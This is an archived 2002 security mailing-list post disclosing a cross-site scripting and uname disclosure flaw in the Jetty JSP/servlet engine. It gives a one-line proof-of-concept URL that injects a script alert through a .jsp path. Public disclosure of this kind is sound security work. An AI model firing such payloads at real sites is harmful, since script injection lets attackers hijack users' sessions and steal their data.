Jetty jsp/servlet engine xss / uname disclosure vuln

From: skinnayat_private
Date: Sat Sep 28 2002 - 10:53:17 PDT

Next message: Jonathan G. Lampe: "SafeTP coughs up internal server IP addresses"

Previous message: Muhammad Faisal Rauf Danka: "Re: Yet another XSS vulnerability in PHP NUKE"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Jetty is an open source jsp/servlet engine thingamabob
http://jetty.mortbay.org

observe
http://jetty.mortbay.org/%0a%0a>alert("jax%20is%20ereet%20:P")</script>.jsp

found by skinnayat_private
www.skinnux.com
( site and email down alot, not that anyone emails me anyway :)

Next message: Jonathan G. Lampe: "SafeTP coughs up internal server IP addresses"
Previous message: Muhammad Faisal Rauf Danka: "Re: Yet another XSS vulnerability in PHP NUKE"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sat Sep 28 2002 - 12:27:44 PDT